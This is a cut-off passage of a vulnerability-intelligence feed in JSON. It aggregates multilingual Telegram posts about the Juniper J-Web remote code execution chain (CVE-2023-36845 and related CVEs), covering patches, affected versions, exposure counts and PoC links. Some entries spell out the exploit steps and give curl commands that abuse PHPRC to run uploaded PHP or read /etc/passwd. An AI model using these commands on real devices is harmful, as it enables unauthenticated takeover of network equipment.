\u0432\u0440\u0430\u0437\u043b\u0438\u0432\u043e\u0441\u0442\u0456 \u0432 \u043a\u043e\u043c\u043f\u043e\u043d\u0435\u043d\u0442\u0456 J-Web \u043c\u043e\u0436\u0443\u0442\u044c \u0431\u0443\u0442\u0438 \u0432\u0438\u043a\u043e\u0440\u0438\u0441\u0442\u0430\u043d\u0456 \u0434\u043b\u044f \u0432\u0438\u043a\u043e\u043d\u0430\u043d\u043d\u044f \u0432\u0456\u0434\u0434\u0430\u043b\u0435\u043d\u043e\u0433\u043e \u043a\u043e\u0434\u0443 \u0431\u0435\u0437 \u043f\u043e\u043f\u0435\u0440\u0435\u0434\u043d\u044c\u043e\u0457 \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0456\u043a\u0430\u0446\u0456\u0457. \u041a\u043e\u043c\u043f\u0430\u043d\u0456\u044f \u043f\u0456\u0434\u0442\u0432\u0435\u0440\u0434\u0438\u043b\u0430, \u0449\u043e \u0437\u043b\u043e\u0432\u043c\u0438\u0441\u043d\u0438\u043a\u0438 \u0432\u0438\u043a\u043e\u0440\u0438\u0441\u0442\u043e\u0432\u0443\u044e\u0442\u044c \u0446\u0456 \u0432\u0440\u0430\u0437\u043b\u0438\u0432\u043e\u0441\u0442\u0456 \u0432 \u0440\u0435\u0430\u043b\u044c\u043d\u0438\u0445 \u0430\u0442\u0430\u043a\u0430\u0445.\n\nCISA \u0432\u0438\u043c\u0430\u0433\u0430\u0454 \u0432\u0456\u0434 \u0444\u0435\u0434\u0435\u0440\u0430\u043b\u044c\u043d\u0438\u0445 \u0430\u0433\u0435\u043d\u0442\u0441\u0442\u0432 \u0443\u0441\u0443\u043d\u0443\u0442\u0438 \u0432\u0438\u044f\u0432\u043b\u0435\u043d\u0456 \u043d\u0435\u0434\u043e\u043b\u0456\u043a\u0438 \u0431\u0435\u0437\u043f\u0435\u043a\u0438 Juniper \u0434\u043e 17 \u043b\u0438\u0441\u0442\u043e\u043f\u0430\u0434\u0430 2023 \u0440\u043e\u043a\u0443, \u0430 \u0432\u0440\u0430\u0437\u043b\u0438\u0432\u0456\u0441\u0442\u044c \u0441\u0435\u0440\u0432\u0435\u0440\u0430 SysAid - \u0434\u043e 4 \u0433\u0440\u0443\u0434\u043d\u044f 2023 \u0440\u043e\u043a\u0443.\n\n\u041a\u043e\u043c\u043f\u0430\u043d\u0456\u044f Juniper \u0440\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u0443\u0454 \u0432\u0438\u043c\u043a\u043d\u0443\u0442\u0438 J-Web \u0430\u0431\u043e \u043e\u0431\u043c\u0435\u0436\u0438\u0442\u0438 \u0434\u043e\u0441\u0442\u0443\u043f \u0434\u043e \u043d\u044c\u043e\u0433\u043e \u043b\u0438\u0448\u0435 \u0434\u043b\u044f \u0434\u043e\u0432\u0456\u0440\u0435\u043d\u0438\u0445 \u0445\u043e\u0441\u0442\u0456\u0432 \u044f\u043a \u0442\u0438\u043c\u0447\u0430\u0441\u043e\u0432\u0438\u0439 \u0437\u0430\u0445\u0456\u0434. \u0412\u0440\u0430\u0437\u043b\u0438\u0432\u043e\u0441\u0442\u0456 \u0431\u0443\u043b\u0438 \u0432\u0438\u044f\u0432\u043b\u0435\u043d\u0456 \u0432 \u0441\u0435\u0440\u043f\u043d\u0456 \u0446\u044c\u043e\u0433\u043e \u0440\u043e\u043a\u0443, \u0430\u043b\u0435, \u0441\u0445\u043e\u0436\u0435, \u0434\u043e \u0446\u044c\u043e\u0433\u043e \u0447\u0430\u0441\u0443 \u043f\u0440\u0430\u043a\u0442\u0438\u0447\u043d\u043e \u043d\u0435 \u0435\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0443\u0432\u0430\u043b\u0438\u0441\u044f. \u041a\u043e\u043c\u043f\u0430\u043d\u0456\u044f \u0432\u0438\u043f\u0443\u0441\u0442\u0438\u043b\u0430 \u0432\u0456\u0434\u043f\u043e\u0432\u0456\u0434\u043d\u0456 \u043f\u0430\u0442\u0447\u0456 \u043d\u0435\u0437\u0430\u0431\u0430\u0440\u043e\u043c \u043f\u0456\u0441\u043b\u044f \u0432\u0438\u044f\u0432\u043b\u0435\u043d\u043d\u044f \u0432\u0440\u0430\u0437\u043b\u0438\u0432\u043e\u0441\u0442\u0435\u0439 \u0456 \u0437 \u0442\u043e\u0433\u043e \u0447\u0430\u0441\u0443 \u0430\u043a\u0442\u0438\u0432\u043d\u043e \u0437\u0430\u043a\u043b\u0438\u043a\u0430\u0454 \u043a\u043b\u0456\u0454\u043d\u0442\u0456\u0432 \u043e\u043d\u043e\u0432\u043b\u044e\u0432\u0430\u0442\u0438 \u0441\u0432\u043e\u0457 \u0435\u043a\u0437\u0435\u043c\u043f\u043b\u044f\u0440\u0438 Junos OS \u0434\u043e \u0431\u0435\u0437\u043f\u0435\u0447\u043d\u043e\u0457 \u0432\u0435\u0440\u0441\u0456\u0457.\n\n\u0412 \u043a\u0456\u043d\u0446\u0456 \u0441\u0435\u0440\u043f\u043d\u044f \u0434\u043e\u0441\u043b\u0456\u0434\u043d\u0438\u043a\u0438 \u0437 watchTowr Labs \u043e\u043f\u0443\u0431\u043b\u0456\u043a\u0443\u0432\u0430\u043b\u0438 PoC-\u0435\u043a\u0441\u043f\u043b\u043e\u0439\u0442 \u0434\u043b\u044f \u0432\u0438\u044f\u0432\u043b\u0435\u043d\u0438\u0445 \u0432\u0440\u0430\u0437\u043b\u0438\u0432\u043e\u0441\u0442\u0435\u0439. \u0410\u0442\u0430\u043a\u0443\u044e\u0447\u0456 \u043c\u043e\u0436\u0443\u0442\u044c \u0432\u0438\u043a\u043e\u0440\u0438\u0441\u0442\u043e\u0432\u0443\u0432\u0430\u0442\u0438 \u043b\u0430\u043d\u0446\u044e\u0436\u043e\u043a \u0456\u0441\u043d\u0443\u044e\u0447\u0438\u0445 \u043d\u0435\u0434\u043e\u043b\u0456\u043a\u0456\u0432 \u0431\u0435\u0437\u043f\u0435\u043a\u0438 \u0434\u043b\u044f \u0432\u0456\u0434\u0434\u0430\u043b\u0435\u043d\u043e\u0433\u043e \u0432\u0438\u043a\u043e\u043d\u0430\u043d\u043d\u044f \u043a\u043e\u0434\u0443 \u043d\u0430 \u0432\u0440\u0430\u0437\u043b\u0438\u0432\u0438\u0445 \u043f\u0440\u0438\u0441\u0442\u0440\u043e\u044f\u0445. \u0414\u043e\u0441\u043b\u0456\u0434\u043d\u0438\u043a\u0438 watchTowr \u0442\u0430\u043a\u043e\u0436 \u0434\u0435\u0442\u0430\u043b\u044c\u043d\u043e \u043e\u043f\u0438\u0441\u0430\u043b\u0438 \u043f\u0440\u043e\u0446\u0435\u0441 \u0432\u0456\u0434\u0442\u0432\u043e\u0440\u0435\u043d\u043d\u044f, \u043e\u0431'\u0454\u0434\u043d\u0430\u043d\u043d\u044f \u0442\u0430 \u0435\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0456\u0457 \u0446\u0438\u0445 \u0432\u0440\u0430\u0437\u043b\u0438\u0432\u043e\u0441\u0442\u0435\u0439.\n\n\u0412 \u0441\u0435\u0440\u0435\u0434\u0438\u043d\u0456 \u0432\u0435\u0440\u0435\u0441\u043d\u044f \u0434\u043e\u0441\u043b\u0456\u0434\u043d\u0438\u043a\u0438 \u0437 VulnCheck \u0432\u0438\u044f\u0432\u0438\u043b\u0438 \u043f\u0440\u0438\u0431\u043b\u0438\u0437\u043d\u043e 15 000 \u0431\u0440\u0430\u043d\u0434\u043c\u0430\u0443\u0435\u0440\u0456\u0432 Juniper SRX \u0456 \u043a\u043e\u043c\u0443\u0442\u0430\u0442\u043e\u0440\u0456\u0432 Juniper EX, \u0434\u043e\u0441\u0442\u0443\u043f\u043d\u0438\u0445 \u0432 \u0406\u043d\u0442\u0435\u0440\u043d\u0435\u0442\u0456 \u0456 \u0432\u0440\u0430\u0437\u043b\u0438\u0432\u0438\u0445 \u0434\u043e \u0432\u0438\u0449\u0435\u0437\u0433\u0430\u0434\u0430\u043d\u0438\u0445 \u0432\u0440\u0430\u0437\u043b\u0438\u0432\u043e\u0441\u0442\u0435\u0439. \u0417\u0430 \u0434\u0430\u043d\u0438\u043c\u0438 VulnCheck, \u0432 \u0441\u0435\u0440\u0435\u0434\u043d\u044c\u043e\u043c\u0443 \u0431\u043b\u0438\u0437\u044c\u043a\u043e 80% \u0437\u0430\u0442\u0440\u043e\u043d\u0443\u0442\u0438\u0445 \u0431\u0440\u0430\u043d\u0434\u043c\u0430\u0443\u0435\u0440\u0456\u0432, \u0434\u043e\u0441\u0442\u0443\u043f\u043d\u0438\u0445 \u0447\u0435\u0440\u0435\u0437 \u0406\u043d\u0442\u0435\u0440\u043d\u0435\u0442, \u0437\u0430\u043b\u0438\u0448\u0430\u043b\u0438\u0441\u044f \u043d\u0435\u043e\u043d\u043e\u0432\u043b\u0435\u043d\u0456 \u043d\u0430 \u043c\u043e\u043c\u0435\u043d\u0442 \u0430\u043d\u0430\u043b\u0456\u0437\u0443.\n\n\u0415\u043a\u0441\u043f\u0435\u0440\u0442\u0438 \u043f\u0456\u0434\u043a\u0440\u0435\u0441\u043b\u044e\u044e\u0442\u044c, \u0449\u043e \u0431\u0440\u0430\u043d\u0434\u043c\u0430\u0443\u0435\u0440\u0438 \u0454 \u043f\u0440\u0438\u0432\u0430\u0431\u043b\u0438\u0432\u0438\u043c\u0438 \u0446\u0456\u043b\u044f\u043c\u0438 \u0434\u043b\u044f \u043d\u0430\u0446\u0456\u043e\u043d\u0430\u043b\u044c\u043d\u0438\u0445 \u0445\u0430\u043a\u0435\u0440\u0456\u0432, \u043e\u0441\u043a\u0456\u043b\u044c\u043a\u0438 \u0432\u043e\u043d\u0438 \u0434\u043e\u0437\u0432\u043e\u043b\u044f\u044e\u0442\u044c \u043f\u0440\u043e\u043d\u0438\u043a\u043d\u0443\u0442\u0438 \u0432 \u0437\u0430\u0445\u0438\u0449\u0435\u043d\u0456 \u043c\u0435\u0440\u0435\u0436\u0456 \u0456 \u043c\u043e\u0436\u0443\u0442\u044c \u0441\u043b\u0443\u0436\u0438\u0442\u0438 \u0445\u043e\u0441\u0442\u0430\u043c\u0438 \u0434\u043b\u044f \u0456\u043d\u0444\u0440\u0430\u0441\u0442\u0440\u0443\u043a\u0442\u0443\u0440\u0438 \u0443\u043f\u0440\u0430\u0432\u043b\u0456\u043d\u043d\u044f \u0456 \u043a\u043e\u043d\u0442\u0440\u043e\u043b\u044e. \u0422\u0456\u043b\u044c\u043a\u0438 \u0441\u0432\u043e\u0454\u0447\u0430\u0441\u043d\u0435 \u0432\u0441\u0442\u0430\u043d\u043e\u0432\u043b\u0435\u043d\u043d\u044f \u043e\u043d\u043e\u0432\u043b\u0435\u043d\u044c \u0431\u0435\u0437\u043f\u0435\u043a\u0438 \u0442\u0430 \u043a\u043e\u043c\u043f\u043b\u0435\u043a\u0441\u043d\u0438\u0439 \u043f\u0456\u0434\u0445\u0456\u0434 \u0434\u043e \u043a\u0456\u0431\u0435\u0440\u0437\u0430\u0445\u0438\u0441\u0442\u0443 \u0437\u043c\u043e\u0436\u0435 \u043e\u0431\u0435\u0440\u0435\u0433\u0442\u0438 \u043e\u0440\u0433\u0430\u043d\u0456\u0437\u0430\u0446\u0456\u0457 \u0432\u0456\u0434 \u043d\u0435\u043f\u0440\u0438\u0454\u043c\u043d\u0438\u0445 \u043d\u0430\u0441\u043b\u0456\u0434\u043a\u0456\u0432 \u0445\u0430\u043a\u0435\u0440\u0441\u044c\u043a\u0438\u0445 \u0430\u0442\u0430\u043a.", "creation_timestamp": "2023-11-19T08:14:40.000000Z"}, {"uuid": "21c477c3-bd12-404e-82bc-0ec45abbfd3e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-36845", "type": "seen", "source": "https://t.me/bh_cat/26", "content": "\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0434\u043b\u044f \u0434\u0430\u043b\u044c\u043d\u0435\u0439\u0448\u0435\u0439 \u0440\u0430\u0431\u043e\u0442\u044b\n\n\u2694\ufe0f  Remote Code Execution in Juniper\n\nCVE-2023-36844 \u0438 CVE-2023-36845 \u0443\u043a\u0430\u0437\u044b\u0432\u0430\u044e\u0442 \u043d\u0430 \u0441\u043b\u0430\u0431\u043e\u0441\u0442\u0438 \u043c\u043e\u0434\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0438 \u0432\u043d\u0435\u0448\u043d\u0438\u0445 \u043f\u0435\u0440\u0435\u043c\u0435\u043d\u043d\u044b\u0445 PHP \u0432 J-Web. \u0418\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435 \u044d\u0442\u0438\u0445 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439 \u0434\u0430\u0435\u0442 \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e\u0441\u0442\u044c \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u044b\u043c \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0430\u043c \u043c\u0430\u043d\u0438\u043f\u0443\u043b\u0438\u0440\u043e\u0432\u0430\u0442\u044c \u0432\u0430\u0436\u043d\u044b\u043c\u0438 \u043f\u0435\u0440\u0435\u043c\u0435\u043d\u043d\u044b\u043c\u0438 \u0441\u0440\u0435\u0434\u044b/ \u0412 \u0441\u0432\u043e\u044e \u043e\u0447\u0435\u0440\u0435\u0434\u044c, \u044d\u0442\u043e \u043c\u043e\u0436\u0435\u0442 \u0441\u043b\u0443\u0436\u0438\u0442\u044c \u043e\u0442\u043f\u0440\u0430\u0432\u043d\u043e\u0439 \u0442\u043e\u0447\u043a\u043e\u0439 \u0434\u043b\u044f \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u044f \u0434\u0440\u0443\u0433\u0438\u0445 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439, \u043f\u043e\u0434\u0447\u0435\u0440\u043a\u0438\u0432\u0430\u044f \u0432\u0430\u0436\u043d\u043e\u0441\u0442\u044c \u043a\u043e\u043c\u043f\u043b\u0435\u043a\u0441\u043d\u044b\u0445 \u043c\u0435\u0440 \u043f\u043e \u0443\u0441\u0442\u0440\u0430\u043d\u0435\u043d\u0438\u044e \u0443\u0433\u0440\u043e\u0437\u044b.\n\u0422\u0430\u043a\u0436\u0435, CVE-2023-36846 \u0438 CVE-2023-36847 \u0440\u0430\u0441\u043a\u0440\u044b\u0432\u0430\u044e\u0442 \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u044b \u0441 \u043e\u0442\u0441\u0443\u0442\u0441\u0442\u0432\u0438\u0435\u043c \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0438 \u0432 Junos OS \u043d\u0430 \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432\u0430\u0445 \u0441\u0435\u0440\u0438\u0438 SRX. \u042d\u0442\u0438 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u043e\u0442\u043a\u0440\u044b\u0432\u0430\u044e\u0442 \u043f\u0443\u0442\u0438 \u0434\u043b\u044f \u0430\u0442\u0430\u043a\u0443\u044e\u0449\u0438\u0445 \u0434\u043b\u044f \u0437\u0430\u0433\u0440\u0443\u0437\u043a\u0438 \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u043b\u044c\u043d\u044b\u0445 \u0444\u0430\u0439\u043b\u043e\u0432 \u0447\u0435\u0440\u0435\u0437 J-Web.\n\n\u2757\ufe0fAffect Versions:\n<=20.4R3-S9    <=22.1R3-S4\n<=21.2R3-S6    <=22.2R3-S2\n<=21.3R3-S5    <=22.3R3-S1\n<=21.4R3-S5     <=22.4R2-S2\n22.4R3\n\n\ud83c\udf10 Source:\n\nhttps://github.com/watchtowrlabs/juniper-rce_cve-2023-36844\n\n#juniper #poc", "creation_timestamp": "2023-09-14T05:56:57.000000Z"}, {"uuid": "06c0bde6-f4b0-4779-a29d-1714eba3b03f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-36845", "type": "published-proof-of-concept", "source": "https://t.me/purple_medved/88", "content": "\u0414\u0430\u0432\u043d\u0435\u043d\u044c\u043a\u043e \u043c\u044b \u0443\u0436\u0435 \u043d\u0435 \u0440\u0430\u0437\u0431\u0438\u0440\u0430\u043b\u0438 \u043d\u043e\u0432\u044b\u0435 CVE, \u043f\u043e\u044d\u0442\u043e\u043c\u0443 \u0441\u0435\u0433\u043e\u0434\u043d\u044f \u043f\u043e\u0433\u043e\u0432\u043e\u0440\u0438\u043c \u043f\u0440\u043e \u0447\u0435\u0439\u043d CVE-2023-36846 - Missing Authentication for Critical Function vulnerability \u0438 CVE-2023-36845 - PHP External Variable Modification vulnerability, \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u044f, \u043a\u043e\u0442\u043e\u0440\u044b\u0445 \u0432 \u0441\u043e\u0432\u043e\u043a\u0443\u043f\u043d\u043e\u0441\u0442\u0438 \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u043d\u0435\u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u0446\u0438\u0440\u043e\u0432\u0430\u043d\u043e\u043c\u0443 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0443 \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e\u0441\u0442\u044c RCE \u043d\u0430 \u0441\u0432\u0438\u0447\u0430\u0445 (EX) \u0438 NGFW (SRX) Juniper \u043f\u043e\u0434 \u0443\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u0435\u043c JunOS.\n\n\u041f\u043e \u0438\u0442\u043e\u0433\u0430\u043c 2020 \u0433\u043e\u0434\u0430 Juniper Network \u0438\u043c\u0435\u043b\u0430 \u043f\u043e\u043a\u0440\u044b\u0442\u0438\u0435 - 8,1% \u043c\u0438\u0440\u043e\u0432\u043e\u0433\u043e \u0440\u044b\u043d\u043a\u0430 \u0441\u0435\u0442\u0435\u0432\u044b\u0445 \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432 (\u0434\u0430\u043d\u043d\u044b\u0435 \u0430\u043d\u0430\u043b\u0438\u0442\u0438\u043a\u0438 Gartner), \u0438\u043c\u0435\u0435\u0442 \u043c\u0438\u043b\u043b\u0438\u0430\u0440\u0434\u043d\u044b\u0435 \u043e\u0431\u043e\u0440\u043e\u0442\u044b, \u043d\u0430\u0437\u0432\u0430\u043d\u0430 \u0432 \u0447\u0435\u0441\u0442\u044c \u043c\u043e\u0436\u0436\u0435\u0432\u0435\u043b\u044c\u043d\u0438\u043a\u0430 \u0438 \u0443\u0448\u043b\u0430 \u0438\u0437 \u0420\u043e\u0441\u0441\u0438\u0438 \u0432 2022 \u0433\u043e\u0434\u0443.\n\n\u0422\u0435\u0445\u043d\u0438\u0447\u0435\u0441\u043a\u0438\u0435 \u043f\u043e\u0434\u0440\u043e\u0431\u043d\u043e\u0441\u0442\u0438 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438 \u0447\u0435\u0439\u043d\u0430 \u044d\u0442\u0438\u0445 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439 \u043f\u0440\u0435\u0434\u0441\u0442\u0430\u0432\u043b\u044f\u044e\u0442 \u0441\u043e\u0431\u043e\u0439 \u043f\u043e\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u044c\u043d\u043e\u0441\u0442\u044c \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0438\u0445 \u0434\u0435\u0439\u0441\u0442\u0432\u0438\u0439:\n\u2611\ufe0f 1. CVE-2023-36846 \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0432 \u043e\u0431\u0445\u043e\u0434 \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0438 \u0437\u0430\u043b\u0438\u0442\u044c php \u0448\u0435\u043b\u043b \u0432 /var/tmp\n\u2611\ufe0f 2. \u0422\u0430\u043a\u0438\u043c \u0436\u0435 \u043e\u0431\u0440\u0430\u0437\u043e\u043c \u0437\u0430\u043b\u0438\u0442\u044c \u0444\u0430\u0439\u043b \u043a\u043e\u043d\u0444\u0438\u0433\u0443\u0440\u0430\u0446\u0438\u0438 php .ini c \u0434\u0438\u0440\u0435\u043a\u0442\u0438\u0432\u043e\u0439 auto_prepend_file \u0434\u043b\u044f \u043f\u0435\u0440\u0432\u043e\u0433\u043e \u0444\u0430\u0439\u043b\u0430 \u0434\u043b\u044f \u043e\u0431\u0445\u043e\u0434\u0430 \u043e\u0433\u0440\u0430\u043d\u0438\u0447\u0435\u043d\u0438\u0439 Verified Exec\n\u2611\ufe0f 3. \u042d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u044f CVE-2023-36845 \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u043f\u0435\u0440\u0435\u0437\u0430\u043f\u0438\u0441\u0430\u0442\u044c \u0441\u043e\u0434\u0435\u0440\u0436\u0438\u043c\u043e\u0435 \u043f\u0435\u0440\u0435\u043c\u0435\u043d\u043d\u043e\u0439 \u043e\u043a\u0440\u0443\u0436\u0435\u043d\u0438\u044f PHPRC, \u0447\u0442\u043e\u0431\u044b \u0432\u044b\u043f\u043e\u043b\u043d\u0438\u0442\u044c \u0444\u0430\u0439\u043b \u043a\u043e\u043d\u0444\u0438\u0433\u0443\u0440\u0430\u0446\u0438\u0438, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u0432 \u0441\u0432\u043e\u044e \u043e\u0447\u0435\u0440\u0435\u0434\u044c \u0432\u044b\u043f\u043e\u043b\u043d\u0438\u0442 \u043f\u0435\u0440\u0432\u044b\u0439 \u0437\u0430\u0433\u0440\u0443\u0436\u0435\u043d\u043d\u044b\u0439 \u0444\u0430\u0439\u043b.\n\u2611\ufe0f 4. curl -X POST --insecure https://xxxxxx/webauth_operation.php -F \"PHPRC=/tmp/xxx.ini\"\n\u2611\ufe0f 5. Profit\n\n\u2699\ufe0fPOC: https://github.com/watchtowrlabs/juniper-rce_cve-2023-36844\n\u2705 \u0420\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u0430\u0446\u0438\u0438: \u041f\u0430\u0442\u0447 \u0443\u0436e \u0434\u043e\u0441\u0442\u0443\u043f\u0435\u043d, \u043d\u0435\u043e\u0431\u0445\u043e\u0434\u0438\u043c\u043e \u043e\u0431\u043d\u043e\u0432\u0438\u0442\u044c\u0441\u044f \u0434\u043e \u043f\u043e\u0441\u043b\u0435\u0434\u043d\u0435\u0439 \u0430\u043a\u0442\u0443\u0430\u043b\u044c\u043d\u043e\u0439 \u0432\u0435\u0440\u0441\u0438\u0438.\n\n#RCE #Juniper #CVE-2023-36844 #CVE-2023-36845 #CVE-2023-36846", "creation_timestamp": "2023-08-29T14:22:41.000000Z"}, {"uuid": "9bb62a34-4253-4a49-b33d-d1dded09f532", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-36845", "type": "published-proof-of-concept", "source": "https://t.me/TheDarkWebInformer/17569", "content": "CVE-2023-36845: $4500 Bounty | Unauthenticated RCE Bug Bounty POC\n\nCredit: youtube.com/@ExploitsSimplified", "creation_timestamp": "2025-05-27T17:11:40.000000Z"}, {"uuid": "a318fc7d-4667-487c-8519-b6252c857f72", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-36845", "type": "published-proof-of-concept", "source": "https://t.me/kasperskyb2b/841", "content": "\ud83e\udd5a \u0414\u043b\u044f RCE \u0432 Juniper SRX  (CVE-2023-36845 \u0438 -36846, CVSS \u0446\u0435\u043f\u043e\u0447\u043a\u0438 9.8) \u043f\u043e\u044f\u0432\u0438\u043b\u0441\u044f PoC. \u0410\u0432\u0442\u043e\u0440\u044b \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u043d\u0438\u044f \u043d\u0430\u0437\u044b\u0432\u0430\u044e\u0442 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u044e \u043e\u0447\u0435\u043d\u044c \u043f\u0440\u043e\u0441\u0442\u043e\u0439 \u0438 \u043d\u0430\u0441\u0442\u043e\u044f\u0442\u0435\u043b\u044c\u043d\u043e \u0440\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u0443\u044e\u0442 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u043c \u043f\u0440\u043e\u0434\u0443\u043a\u0442\u043e\u0432 Juniper \u043f\u0440\u0438\u043c\u0435\u043d\u0438\u0442\u044c \u043f\u0430\u0442\u0447\u0438 \u043c\u0430\u043a\u0441\u0438\u043c\u0430\u043b\u044c\u043d\u043e \u0431\u044b\u0441\u0442\u0440\u043e. \u0422\u0435\u043f\u0435\u0440\u044c, \u043a\u043e\u0433\u0434\u0430 \u0435\u0441\u0442\u044c \u043f\u0443\u0431\u043b\u0438\u0447\u043d\u044b\u0439 PoC, \u0440\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u0430\u0446\u0438\u044f \u0441\u0442\u0430\u043b\u0430 \u043e\u0447\u0435\u043d\u044c \u0430\u043a\u0442\u0443\u0430\u043b\u044c\u043d\u0430.  \u0412 \u043a\u043e\u043d\u0446\u0435 \u043f\u0440\u043e\u0441\u0442\u0440\u0430\u043d\u043d\u043e\u0433\u043e \u0442\u0435\u043a\u0441\u0442\u0430 \u0435\u0441\u0442\u044c \u0440\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u0430\u0446\u0438\u0438 \u043f\u043e \u0430\u043d\u0430\u043b\u0438\u0437\u0443 \u043b\u043e\u0433\u043e\u0432 \u043d\u0430 \u043f\u0440\u0438\u0437\u043d\u0430\u043a\u0438 \u0443\u0436\u0435 \u043f\u0440\u043e\u0448\u0435\u0434\u0448\u0435\u0439 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438. \n\n#\u043d\u043e\u0432\u043e\u0441\u0442\u0438 @\u041f2\u0422", "creation_timestamp": "2023-08-29T11:02:23.000000Z"}, {"uuid": "72b62e0e-5e4e-4bb4-b0c9-e16d844706b6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-36845", "type": "seen", "source": "https://t.me/ctinow/137842", "content": "https://ift.tt/dRTIlLB\n12,000 Juniper SRX firewalls and EX switches vulnerable to CVE-2023-36845", "creation_timestamp": "2023-09-19T14:28:58.000000Z"}, {"uuid": "8d33f238-8107-4416-bd52-e12276321425", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-36845", "type": "published-proof-of-concept", "source": "Telegram/yoiEpgOYar6rg1BhFgPhKGs968JcjQBMcTrThsJGxEjJNA", "content": "", "creation_timestamp": "2023-11-12T16:45:06.000000Z"}, {"uuid": "f5709302-9f60-44b2-bdd3-5bd601f484e7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-36845", "type": "published-proof-of-concept", "source": "https://t.me/Teamx1945x/4302", "content": "CVE ID : CVE-2023-36845\nsytem : Juniper Networks Junos OS\nType : RCE\n\nExploit \u0627\u0644\u0627\u0633\u063a\u0644\u0627\u0644:\ncurl -kv \"https ://exmple.com/about.php?PHPRC=/dev/fd/0\" --data-binary 'auto_prepend_file=\"/etc/passwd\"'\n\n#\u0627\u0633\u062a\u063a\u0644\u0627\u0644_\u062b\u063a\u0631\u0629", "creation_timestamp": "2024-04-21T09:53:16.000000Z"}, {"uuid": "0bbcd2cb-2207-44be-8ded-cb78ab49a28c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-36845", "type": "published-proof-of-concept", "source": "Telegram/wsUy-qUCa0pXR2VY_PJFJ2WGXphWz3ptr7ghmMlI7G_ZNBYR", "content": "", "creation_timestamp": "2024-06-15T14:48:24.000000Z"}, {"uuid": "fefd276f-56c6-4455-8815-fcd9113b4799", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-36845", "type": "published-proof-of-concept", "source": "https://t.me/intell137/64", "content": "CVE-2023-36845 \u0438 CVE-2023-36846\nJuniper Junos OS J-Web RCE\n*\n\u041d\u0430 \u0432\u0441\u0435 \u044d\u0442\u043e \u0434\u0435\u043b\u043e \u0435\u0441\u0442\u044c \u0438 \u0441\u043f\u043b\u043e\u0438\u0442 \u043d\u0430 \u043f\u0438\u0442\u043e\u043d\u0435\n\u043d\u043e 